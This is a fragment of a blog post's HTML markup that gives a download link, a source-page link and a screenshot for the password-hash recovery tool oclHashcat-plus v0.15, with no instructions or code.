<span style="font-family: Georgia, 'Times New Roman', serif;"><span style="background-color: white; line-height: 22px;">Download -</span></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 15px;">oclHashcat-plus </span><a href="http://hashcat.net/files/oclHashcat-plus-0.15.7z" style="color: #999999; line-height: 15px; outline: none;">v0.15</a></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="font-family: Georgia, 'Times New Roman', serif;"><span style="background-color: white; line-height: 22px;">Source -</span></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://hashcat.net/oclhashcat-plus/" style="color: #d86513; outline: none;">http://hashcat.net/oclhashcat-plus/</a></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="background-color: #333333; clear: both; color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5nsHUNJey5bODIbuvL4PYs_hVaUM8EGZPfS-0sUBpmyvvHLpmW9dxg81Lccze_pIyA3IwIhXwJKKVz0y1JUAHhnuzexhVaxxURq4Fuf_qKm6Ce5EhDXmibMWF4gZAdBxJBCCyseNuLE1Y/s1600/oclhashcat-plus.png" imageanchor="1" style="clear: left; color: #ff8f39; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5nsHUNJey5bODIbuvL4PYs_hVaUM8EGZPfS-0sUBpmyvvHLpmW9dxg81Lccze_pIyA3IwIhXwJKKVz0y1JUAHhnuzexhVaxxURq4Fuf_qKm6Ce5EhDXmibMWF4gZAdBxJBCCyseNuLE1Y/s1600/oclhashcat-plus.png" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></div>
</div>